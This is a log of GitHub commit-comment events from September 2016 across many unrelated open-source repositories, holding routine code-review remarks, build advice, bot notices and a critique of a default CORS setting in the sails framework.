{"id":"4631816162","type":"CommitCommentEvent","actor":{"login":"mattlevine"},"repo":{"name":"blueriver/MuraCMS"},"payload":{"comment":{"id":19210282,"position":null,"line":null,"path":null,"commit_id":"0a82fb36f091d61edd648350102f59f3af4eeb40","created_at":"2016-09-28T16:25:35Z","updated_at":"2016-09-28T16:25:35Z","body":"No, because that code only changes the cfsqltype on the query's param and not the value.  Honestly, the line code where the issue was happening probably is probably not needed, but there was a weird Postgres issue where a value passed isNumeric() but would not validate with the integer query param type.  Which is weird."}},"created_at":"2016-09-28T16:25:35Z"}
{"id":"4631818502","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaGraphics/FreeType.jl"},"payload":{"comment":{"id":19210286,"position":null,"line":null,"path":null,"commit_id":"44fc7c39ea678308a6e6820639853afbcc1f1897","created_at":"2016-09-28T16:25:58Z","updated_at":"2016-09-28T16:25:58Z","body":"should adjust travis too"}},"created_at":"2016-09-28T16:25:58Z"}
{"id":"4631832618","type":"CommitCommentEvent","actor":{"login":"isidorn"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19210313,"position":null,"line":null,"path":null,"commit_id":"48af04a01cd5a7c4b970404184af3d52c01d6625","created_at":"2016-09-28T16:28:15Z","updated_at":"2016-09-28T16:28:15Z","body":"Awwww\r\nBest movie of last year!"}},"created_at":"2016-09-28T16:28:15Z"}
{"id":"4631837187","type":"CommitCommentEvent","actor":{"login":"joseluis2g"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19210320,"position":null,"line":null,"path":null,"commit_id":"195e0ac954d01419b62dbed89eee027c3175ff58","created_at":"2016-09-28T16:29:01Z","updated_at":"2016-09-28T16:29:01Z","body":"wtf is that code"}},"created_at":"2016-09-28T16:29:01Z"}
{"id":"4631838671","type":"CommitCommentEvent","actor":{"login":"omgmog"},"repo":{"name":"benfoxall/decks"},"payload":{"comment":{"id":19210323,"position":null,"line":null,"path":null,"commit_id":"6b8b1ccf897ab8be729c22a578754da30b89338a","created_at":"2016-09-28T16:29:16Z","updated_at":"2016-09-28T16:29:16Z","body":"😱 Make sure you use the Fira White theme!"}},"created_at":"2016-09-28T16:29:16Z"}
{"id":"4631840665","type":"CommitCommentEvent","actor":{"login":"souljocker"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19210328,"position":null,"line":null,"path":null,"commit_id":"195e0ac954d01419b62dbed89eee027c3175ff58","created_at":"2016-09-28T16:29:38Z","updated_at":"2016-09-28T16:29:38Z","body":"mas ein?\r\nessa porta ta meio estranha..."}},"created_at":"2016-09-28T16:29:38Z"}
{"id":"4631842021","type":"CommitCommentEvent","actor":{"login":"DCubix"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19210330,"position":null,"line":null,"path":null,"commit_id":"56c5633533c3a7e9002f60779099aa09c03fcc93","created_at":"2016-09-28T16:29:51Z","updated_at":"2016-09-28T16:29:51Z","body":"cool but I thought I was going to do this. But no problem :)"}},"created_at":"2016-09-28T16:29:51Z"}
{"id":"4631844691","type":"CommitCommentEvent","actor":{"login":"benpete22"},"repo":{"name":"benpete22/cats"},"payload":{"comment":{"id":19210332,"position":131,"line":147,"path":"index.html","commit_id":"b0d40913ec015f52c600dc2d426b81f2ae1e0392","created_at":"2016-09-28T16:30:18Z","updated_at":"2016-09-28T16:30:18Z","body":"Need help getting these buttons to take up the full width of the element that they are in. "}},"created_at":"2016-09-28T16:30:18Z"}
{"id":"4631852369","type":"CommitCommentEvent","actor":{"login":"FirStack"},"repo":{"name":"GuangStack/test"},"payload":{"comment":{"id":19210350,"position":null,"line":null,"path":null,"commit_id":"c608946f647d311a16e8825820b805548b0d0c6b","created_at":"2016-09-28T16:31:31Z","updated_at":"2016-09-28T16:31:31Z","body":"jjjjjjjjj"}},"created_at":"2016-09-28T16:31:31Z"}
{"id":"4631856147","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19210359,"position":53,"line":520,"path":"EMF/events/emf_mongol.txt","commit_id":"f546d7dc11e6bb0a95dc157783f905fa27371b30","created_at":"2016-09-28T16:32:07Z","updated_at":"2016-09-28T16:32:07Z","body":"`location = { emf_il_khanate_province = yes }` would match the comment and presumably your intention."}},"created_at":"2016-09-28T16:32:07Z"}
{"id":"4631860025","type":"CommitCommentEvent","actor":{"login":"b3"},"repo":{"name":"b3/battery-stats"},"payload":{"comment":{"id":19210373,"position":null,"line":null,"path":null,"commit_id":"7ea441d1295abbe83a80323f40a27732d6d52553","created_at":"2016-09-28T16:32:47Z","updated_at":"2016-09-28T16:32:47Z","body":"I do not think that the missing power supply should cause a cron email.\r\n\r\nIn fact I am unsure that this message should be raised at all. Without power supply detection `battery-stats-collector` still work.\r\n\r\nMy idea was that if the connected status (online or offline) can be detected it should be logged, but if it can not be detected that information shoud be logged too. That was why I propose 3 states. I do not presuppose any use of that information though."}},"created_at":"2016-09-28T16:32:47Z"}
{"id":"4631860034","type":"CommitCommentEvent","actor":{"login":"RbkGh"},"repo":{"name":"devcken/angular2-localstorage"},"payload":{"comment":{"id":19210374,"position":null,"line":null,"path":null,"commit_id":"ca05fbfa2a691f3f7fe80ac9c5e69b2e4269cc52","created_at":"2016-09-28T16:32:47Z","updated_at":"2016-09-28T16:32:47Z","body":"Hi,can you make your proper update to 2.0 available on npm with a different name? I need to use in my project asap"}},"created_at":"2016-09-28T16:32:47Z"}
{"id":"4631862491","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"ianboucher/Bloc-Pong"},"payload":{"comment":{"id":19210376,"position":16,"line":15,"path":"app/scripts/directives/pongGame.js","commit_id":"1b20316e7a04803fda3d9a6fdf5db639ab52b167","created_at":"2016-09-28T16:33:13Z","updated_at":"2016-09-28T16:33:13Z","body":"Instead of forcing the code to do that division every time, you could just put in the value it works out to be. If you want to avoid \"magic numbers\", you can leave a comment like `// 1000 / 60`, but even then it does not demystify anything; there is nothing stating _why_ that number is being used."}},"created_at":"2016-09-28T16:33:13Z"}
{"id":"4631864407","type":"CommitCommentEvent","actor":{"login":"thelastinuit"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19210380,"position":3,"line":3,"path":"happiness/README.md","commit_id":"55f4e052e9efa3ede859d5bf151d48dbe55f6785","created_at":"2016-09-28T16:33:32Z","updated_at":"2016-09-28T16:33:32Z","body":"wouldn't be better \"We strongly believe the happier a developer...\" ?"}},"created_at":"2016-09-28T16:33:32Z"}
{"id":"4631864485","type":"CommitCommentEvent","actor":{"login":"naderman"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":19210379,"position":null,"line":null,"path":null,"commit_id":"15d572da4c2488acc6956dcaa76157da0781f03a","created_at":"2016-09-28T16:33:31Z","updated_at":"2016-09-28T16:33:31Z","body":"Heh I do actually read when I'm mentioned, but yes please open an issue, cause this is hard to look up later. :-)"}},"created_at":"2016-09-28T16:33:31Z"}
{"id":"4631867334","type":"CommitCommentEvent","actor":{"login":"skylarmt"},"repo":{"name":"skylarmt/SnipeITAPI"},"payload":{"comment":{"id":19210386,"position":null,"line":null,"path":null,"commit_id":"96a71bfa42aef37d85cf155e119d3b02a2439ee0","created_at":"2016-09-28T16:34:01Z","updated_at":"2016-09-28T16:34:01Z","body":"Oops, that was a strange commit."}},"created_at":"2016-09-28T16:34:01Z"}
{"id":"4631868314","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19210392,"position":null,"line":null,"path":null,"commit_id":"f546d7dc11e6bb0a95dc157783f905fa27371b30","created_at":"2016-09-28T16:34:11Z","updated_at":"2016-09-28T16:34:11Z","body":"What is the `history/` Temujin exists and is landed? That came very close to happening in my observe earlier, he was fighting a duchy adventure that he could have won when the mongol invasion code snatched him"}},"created_at":"2016-09-28T16:34:11Z"}
{"id":"4631868789","type":"CommitCommentEvent","actor":{"login":"thelastinuit"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19210398,"position":35,"line":35,"path":"happiness/README.md","commit_id":"55f4e052e9efa3ede859d5bf151d48dbe55f6785","created_at":"2016-09-28T16:34:15Z","updated_at":"2016-09-28T16:34:15Z","body":"Huh.. is it that misleading? Are we looking for people to write faster? "}},"created_at":"2016-09-28T16:34:15Z"}
{"id":"4631870163","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"ianboucher/Bloc-Pong"},"payload":{"comment":{"id":19210402,"position":54,"line":61,"path":"app/scripts/directives/pongGame.js","commit_id":"1b20316e7a04803fda3d9a6fdf5db639ab52b167","created_at":"2016-09-28T16:34:29Z","updated_at":"2016-09-28T16:34:29Z","body":"It may be worth attempting to not start the ball in the same direction each time."}},"created_at":"2016-09-28T16:34:29Z"}
{"id":"4631873207","type":"CommitCommentEvent","actor":{"login":"pp-qq"},"repo":{"name":"redis/hiredis"},"payload":{"comment":{"id":19210408,"position":22,"line":22,"path":"adapters/libuv.h","commit_id":"61277d09251cfef4f768ea5d263145248e2c3a83","created_at":"2016-09-28T16:35:02Z","updated_at":"2016-09-28T16:35:02Z","body":"`redisAsyncFree(p->context);`?"}},"created_at":"2016-09-28T16:35:02Z"}
{"id":"4631873766","type":"CommitCommentEvent","actor":{"login":"killme"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19210409,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T16:35:10Z","updated_at":"2016-09-28T16:35:10Z","body":"Hm, must have missed that when testing.\nI will take another look as it was not working before this commit for me.\n"}},"created_at":"2016-09-28T16:35:10Z"}
{"id":"4631874656","type":"CommitCommentEvent","actor":{"login":"pp-qq"},"repo":{"name":"redis/hiredis"},"payload":{"comment":{"id":19210412,"position":21,"line":21,"path":"adapters/libuv.h","commit_id":"61277d09251cfef4f768ea5d263145248e2c3a83","created_at":"2016-09-28T16:35:19Z","updated_at":"2016-09-28T16:35:19Z","body":"`redisAsyncFree(p->context);`?"}},"created_at":"2016-09-28T16:35:19Z"}
{"id":"4631879145","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19210425,"position":91,"line":4254,"path":"EMF/events/mongol_events.txt","commit_id":"f546d7dc11e6bb0a95dc157783f905fa27371b30","created_at":"2016-09-28T16:36:04Z","updated_at":"2016-09-28T16:36:04Z","body":"Not sure if you want to copy the EMF+SWMH code straight over to plain EMF? After all, Temujin is on the EMF+Vanilla map, isn't he? I might be missing something regarding the way you're handling this now, though."}},"created_at":"2016-09-28T16:36:04Z"}
{"id":"4631879573","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19210427,"position":4,"line":153,"path":"src/main/scala/main.scala","commit_id":"f8ee99c1c0e2c7c9b5ea9635657f2410d2b24e38","created_at":"2016-09-28T16:36:10Z","updated_at":"2016-09-28T16:36:10Z","body":"🐹 🐹 🐹 🐹 🐹 🐹 🐹 🐹 🐹 🐹 🐹 🐹 🐹 🐹 "}},"created_at":"2016-09-28T16:36:10Z"}
{"id":"4631880423","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"ianboucher/Bloc-Pong"},"payload":{"comment":{"id":19210429,"position":89,"line":100,"path":"app/scripts/directives/pongGame.js","commit_id":"1b20316e7a04803fda3d9a6fdf5db639ab52b167","created_at":"2016-09-28T16:36:18Z","updated_at":"2016-09-28T16:36:18Z","body":"A `reset` method would allow you to alter the starting state without having to do it here and in the constructor."}},"created_at":"2016-09-28T16:36:18Z"}
{"id":"4631883115","type":"CommitCommentEvent","actor":{"login":"thelastinuit"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19210436,"position":51,"line":51,"path":"happiness/README.md","commit_id":"55f4e052e9efa3ede859d5bf151d48dbe55f6785","created_at":"2016-09-28T16:36:45Z","updated_at":"2016-09-28T16:36:45Z","body":"**your** mind"}},"created_at":"2016-09-28T16:36:45Z"}
{"id":"4631884510","type":"CommitCommentEvent","actor":{"login":"Tortel"},"repo":{"name":"CyanogenMod/android_device_samsung_manta"},"payload":{"comment":{"id":19210441,"position":null,"line":null,"path":null,"commit_id":"76df05906ef7e52cb13a6359254fe27681060ef9","created_at":"2016-09-28T16:36:58Z","updated_at":"2016-09-28T16:36:58Z","body":"It includes less files in the build, freeing up space on /system for packages like Gapps"}},"created_at":"2016-09-28T16:36:58Z"}
{"id":"4631884924","type":"CommitCommentEvent","actor":{"login":"kbansal"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":19210444,"position":5,"line":19,"path":"src/lib/clock_gettime.c","commit_id":"2039eab2d76cf5f4cfe44680f5325f44a4fc5a99","created_at":"2016-09-28T16:37:03Z","updated_at":"2016-09-28T16:37:03Z","body":"Sorry for delayed followup, let me know if this is not yet fixed / bug hasn't been filed."}},"created_at":"2016-09-28T16:37:03Z"}
{"id":"4631888581","type":"CommitCommentEvent","actor":{"login":"kbansal"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":19210458,"position":5,"line":1989,"path":"src/parser/cvc/Cvc.g","commit_id":"2039eab2d76cf5f4cfe44680f5325f44a4fc5a99","created_at":"2016-09-28T16:37:43Z","updated_at":"2016-09-28T16:37:43Z","body":"Follow-up on Bug 753."}},"created_at":"2016-09-28T16:37:43Z"}
{"id":"4631889754","type":"CommitCommentEvent","actor":{"login":"mloubout"},"repo":{"name":"opesci/devito"},"payload":{"comment":{"id":19210465,"position":null,"line":null,"path":null,"commit_id":"c8a28aaa6fdc1dc76083aae0a185271bccb149ba","created_at":"2016-09-28T16:37:54Z","updated_at":"2016-09-28T16:37:54Z","body":"Has to be reverted. ALso need gradients, .... in TTI"}},"created_at":"2016-09-28T16:37:54Z"}
{"id":"4631891015","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19210474,"position":18,"line":24,"path":"src/main/scala/main.scala","commit_id":"6ff8757e872463aa36eb1120ecebcdc8137d6057","created_at":"2016-09-28T16:38:06Z","updated_at":"2016-09-28T16:38:06Z","body":"hello 👍 "}},"created_at":"2016-09-28T16:38:06Z"}
{"id":"4631891687","type":"CommitCommentEvent","actor":{"login":"edzer"},"repo":{"name":"pacificclimate/Rudunits2"},"payload":{"comment":{"id":19210476,"position":2,"line":1,"path":"R/ud.functions.R","commit_id":"298e789729cf8388203fcfe07a6870cfbad2eee3","created_at":"2016-09-28T16:38:12Z","updated_at":"2016-09-28T16:38:12Z","body":"Yes, but ?.onLoad sais it does not forbid that. In this case, it is an essential message that has to go in .onLoad, otherwise you can load it disfunctionally, which is not good. The messages they want to avoid is those that advertise itself, print versions and the like. We can explain this to Uwe, or whoever is handling CRAN when we submit."}},"created_at":"2016-09-28T16:38:12Z"}
{"id":"4631891789","type":"CommitCommentEvent","actor":{"login":"kbansal"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":19210478,"position":1,"line":1,"path":"src/theory/sets/card_unused_implementation.cpp","commit_id":"2039eab2d76cf5f4cfe44680f5325f44a4fc5a99","created_at":"2016-09-28T16:38:13Z","updated_at":"2016-09-28T16:38:13Z","body":"Will do."}},"created_at":"2016-09-28T16:38:13Z"}
{"id":"4631893201","type":"CommitCommentEvent","actor":{"login":"benpete22"},"repo":{"name":"benpete22/cats"},"payload":{"comment":{"id":19210486,"position":null,"line":null,"path":null,"commit_id":"b0d40913ec015f52c600dc2d426b81f2ae1e0392","created_at":"2016-09-28T16:38:29Z","updated_at":"2016-09-28T16:38:29Z","body":"Still need work/help with CSS...\r\nit would be nice if the buttons would take up the full width of the cards that they are in. \r\nand I think it would be good if I could get flex-box working properly to get all of the cards to be the same length. \r\n"}},"created_at":"2016-09-28T16:38:29Z"}
{"id":"4631896675","type":"CommitCommentEvent","actor":{"login":"badboy"},"repo":{"name":"redis/hiredis"},"payload":{"comment":{"id":19210497,"position":21,"line":21,"path":"adapters/libuv.h","commit_id":"61277d09251cfef4f768ea5d263145248e2c3a83","created_at":"2016-09-28T16:39:05Z","updated_at":"2016-09-28T16:39:05Z","body":"Uhm, why?"}},"created_at":"2016-09-28T16:39:05Z"}
{"id":"4631896949","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19210498,"position":null,"line":null,"path":null,"commit_id":"12e9ac03f1db5f007bb8f12abc33abef05546194","created_at":"2016-09-28T16:39:08Z","updated_at":"2016-09-28T16:39:08Z","body":"I doubt that error is related to that commit. have you verified that boost is set up properly on your machine? it's the number 1 cause of build issues around here; incorrectly configured boost setups."}},"created_at":"2016-09-28T16:39:08Z"}
{"id":"4631900400","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19210509,"position":5,"line":44,"path":"src/main/java/agilepuppers/cleanwater/controller/RegisterScreen.java","commit_id":"7034a9bfa9337037104f9a7be11744fcf6ac7e07","created_at":"2016-09-28T16:39:44Z","updated_at":"2016-09-28T16:39:44Z","body":"@hugabor can you put a comment above this line to explain the regex pattern in-context"}},"created_at":"2016-09-28T16:39:44Z"}
{"id":"4631902093","type":"CommitCommentEvent","actor":{"login":"kbansal"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":19210517,"position":null,"line":null,"path":null,"commit_id":"2039eab2d76cf5f4cfe44680f5325f44a4fc5a99","created_at":"2016-09-28T16:40:01Z","updated_at":"2016-09-28T16:40:01Z","body":"@timothy-king : reg. expected statuses, filed bug 754."}},"created_at":"2016-09-28T16:40:01Z"}
{"id":"4631904306","type":"CommitCommentEvent","actor":{"login":"alanbarrett"},"repo":{"name":"TheRosettaFoundation/SOLAS-Match"},"payload":{"comment":{"id":19210522,"position":null,"line":null,"path":null,"commit_id":"586b66b37a4653e756c27d11aac536677ac76125","created_at":"2016-09-28T16:40:24Z","updated_at":"2016-09-28T16:40:24Z","body":"Addresses https://github.com/TheRosettaFoundation/SOLAS-Match/issues/1166"}},"created_at":"2016-09-28T16:40:24Z"}
{"id":"4631916578","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210548,"position":57,"line":217,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:42:33Z","updated_at":"2016-09-28T16:42:33Z","body":"Done: unit test and a lot of bugfixes :scream: "}},"created_at":"2016-09-28T16:42:33Z"}
{"id":"4631922828","type":"CommitCommentEvent","actor":{"login":"oleg-nenashev"},"repo":{"name":"jenkinsci/remoting"},"payload":{"comment":{"id":19210562,"position":null,"line":null,"path":null,"commit_id":"190653b3a3e7a9b582cf923201c735d6d3043ea2","created_at":"2016-09-28T16:43:36Z","updated_at":"2016-09-28T16:43:36Z","body":"Seems somethis has been messed up. It's not actually a merge commit"}},"created_at":"2016-09-28T16:43:36Z"}
{"id":"4631924652","type":"CommitCommentEvent","actor":{"login":"IsabelSedano"},"repo":{"name":"IsabelSedano/php01"},"payload":{"comment":{"id":19210566,"position":1,"line":1,"path":"README.md","commit_id":"d34916736bf6fe61ec43226b7dbbbe2959a05739","created_at":"2016-09-28T16:43:55Z","updated_at":"2016-09-28T16:43:55Z","body":"l"}},"created_at":"2016-09-28T16:43:55Z"}
{"id":"4631926225","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":19210569,"position":null,"line":null,"path":null,"commit_id":"8753bf80b9a13feb1a4ec530a7f34c808f9277d1","created_at":"2016-09-28T16:44:10Z","updated_at":"2016-09-28T16:44:10Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-28T16:44:10Z"}
{"id":"4631927382","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210570,"position":110,"line":270,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:44:22Z","updated_at":"2016-09-28T16:44:22Z","body":"done"}},"created_at":"2016-09-28T16:44:22Z"}
{"id":"4631928432","type":"CommitCommentEvent","actor":{"login":"trntv"},"repo":{"name":"trntv/yii2-starter-kit"},"payload":{"comment":{"id":19210572,"position":null,"line":null,"path":null,"commit_id":"220c77389e9072ecace8cc4bfc51063d3ec24dc7","created_at":"2016-09-28T16:44:33Z","updated_at":"2016-09-28T16:44:33Z","body":":-("}},"created_at":"2016-09-28T16:44:33Z"}
{"id":"4631930026","type":"CommitCommentEvent","actor":{"login":"frmdstryr"},"repo":{"name":"frmdstryr/garden.mapview"},"payload":{"comment":{"id":19210576,"position":null,"line":null,"path":null,"commit_id":"8e101d5cf21206b2e192beab5a382f7615ca42ad","created_at":"2016-09-28T16:44:48Z","updated_at":"2016-09-28T16:44:48Z","body":"I've only used it with the new toolchain. Precompile by using 'python setup.py build_ext --inplace'. Then build the apk as you normally do"}},"created_at":"2016-09-28T16:44:48Z"}
{"id":"4631933946","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19210582,"position":null,"line":null,"path":null,"commit_id":"f546d7dc11e6bb0a95dc157783f905fa27371b30","created_at":"2016-09-28T16:45:30Z","updated_at":"2016-09-28T16:45:30Z","body":"`is_ruler` does include host titles, yes."}},"created_at":"2016-09-28T16:45:30Z"}
{"id":"4631934482","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19210586,"position":null,"line":null,"path":null,"commit_id":"edbceba061d9ef1331af6ba574a9796be1aa4068","created_at":"2016-09-28T16:45:35Z","updated_at":"2016-09-28T16:45:35Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\r\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\r\n- [source/_views/doc.html](https://github.com/pantheon-systems/documentation/commit/5056c17b4c89e663ca0e196bccb1af944af6bcd9/source/_views/doc.html)\r\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/edbceba061d9ef1331af6ba574a9796be1aa4068/source/_views/default.html)\n"}},"created_at":"2016-09-28T16:45:35Z"}
{"id":"4631937075","type":"CommitCommentEvent","actor":{"login":"thelastinuit"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19210591,"position":15,"line":15,"path":"stack/ruby/BEST_PRACTICES.md","commit_id":"4ec4a1cd50dee83f6fddb2635e5aa67484c76ecd","created_at":"2016-09-28T16:46:02Z","updated_at":"2016-09-28T16:46:02Z","body":"I know is jargon but wouldn't be better to say \"as SOLID as possible\" ?"}},"created_at":"2016-09-28T16:46:02Z"}
{"id":"4631937959","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210593,"position":117,"line":277,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:46:11Z","updated_at":"2016-09-28T16:46:11Z","body":"The prime tower might consist of a more complex shape in the future and then the segment needs to change, but the generation of wipe locations is robust for longer segments as well.\r\n\r\nAdded more doc..."}},"created_at":"2016-09-28T16:46:11Z"}
{"id":"4631939047","type":"CommitCommentEvent","actor":{"login":"groeneveld91"},"repo":{"name":"agdraft/agdraft"},"payload":{"comment":{"id":19210596,"position":5,"line":5,"path":"app/controllers/jobs_controller.rb","commit_id":"4f7f38b48511a5aa2d22ea7bea890b702c577121","created_at":"2016-09-28T16:46:22Z","updated_at":"2016-09-28T16:46:22Z","body":"i found this hard to read initially.. how about `JobWorker.where(job_id: params[:id], worker_id: current_worker.try(:id)).exists?`"}},"created_at":"2016-09-28T16:46:22Z"}
{"id":"4631942012","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19210605,"position":null,"line":null,"path":null,"commit_id":"fd58ee62890b8c7e468c92a16aa51728908da49d","created_at":"2016-09-28T16:46:52Z","updated_at":"2016-09-28T16:46:52Z","body":"Honestly replace those awful ring buffers wtih a std::queue<u32> fifo. "}},"created_at":"2016-09-28T16:46:52Z"}
{"id":"4631942532","type":"CommitCommentEvent","actor":{"login":"raj454raj"},"repo":{"name":"stopstalk/stopstalk-deployment"},"payload":{"comment":{"id":19210608,"position":null,"line":null,"path":null,"commit_id":"5f5c8581db69fa66cf6361c304afb82e602d7c57","created_at":"2016-09-28T16:46:57Z","updated_at":"2016-09-28T16:46:57Z","body":"Records may have unverified emails."}},"created_at":"2016-09-28T16:46:57Z"}
{"id":"4631944728","type":"CommitCommentEvent","actor":{"login":"cuongquay"},"repo":{"name":"mectors/node-red-contrib-aws-iot"},"payload":{"comment":{"id":19210612,"position":null,"line":null,"path":null,"commit_id":"a73986d2fb448640e73e2a2ee17665adb35b3204","created_at":"2016-09-28T16:47:20Z","updated_at":"2016-09-28T16:47:20Z","body":"Thanks for your updated code. I will merge to my branch as well"}},"created_at":"2016-09-28T16:47:20Z"}
{"id":"4631947179","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210619,"position":125,"line":285,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:47:45Z","updated_at":"2016-09-28T16:47:45Z","body":"This code is different now; after some bugfixes.."}},"created_at":"2016-09-28T16:47:45Z"}
{"id":"4631949703","type":"CommitCommentEvent","actor":{"login":"CodeCrafter47"},"repo":{"name":"CodeCrafter47/BungeeTabListPlus"},"payload":{"comment":{"id":19210627,"position":null,"line":null,"path":null,"commit_id":"49404bbfc797f97ae7351fd581712d8728c73b51","created_at":"2016-09-28T16:48:13Z","updated_at":"2016-09-28T16:48:13Z","body":"Yes it does."}},"created_at":"2016-09-28T16:48:13Z"}
{"id":"4631950941","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210628,"position":143,"line":303,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:48:25Z","updated_at":"2016-09-28T16:48:25Z","body":"Yes on the edge, but not always exactly on a vert.\r\nYou go past a vert towards the next vert."}},"created_at":"2016-09-28T16:48:25Z"}
{"id":"4631952242","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210632,"position":148,"line":308,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:48:41Z","updated_at":"2016-09-28T16:48:41Z","body":"fixed"}},"created_at":"2016-09-28T16:48:41Z"}
{"id":"4631953989","type":"CommitCommentEvent","actor":{"login":"ejcx"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19210642,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T16:48:57Z","updated_at":"2016-09-28T16:48:57Z","body":"@irond13 That's a good use case. I frankly find this ridiculous. I don't know of a single site that needs to allow credentials for all domains. ACAO as \"*\" is much more in line with the spirit of CORS, and prevents people from shooting themselves in the foot, which is very different from setting the ACAO header to be the Origin request header.\r\n\r\nCORS specifically (tries) to guards against people setting a wide open policy by disallowing Access-Control-Allow-Origin: * being used with Access-Control-Allow-Credentials: true. Sailsjs is circumventing that AND making it the default behavior.\r\n\r\nFrom your commit reverting the change:\r\n\r\n>   The default (documented) behavior...is to leave your app wide open, which is **completely acceptable (and in some cases desirable)** as long as you are careful not to expose anything dangerous.\r\n\r\nI would love for you to show me one example of a site that this is \"desired\".\r\nAll sites that desire to be open, will never have credentials (cookies), and could be serviced with an Access-Control-Allow-Origin: * header (like sailsjs.org).\r\n"}},"created_at":"2016-09-28T16:48:57Z"}
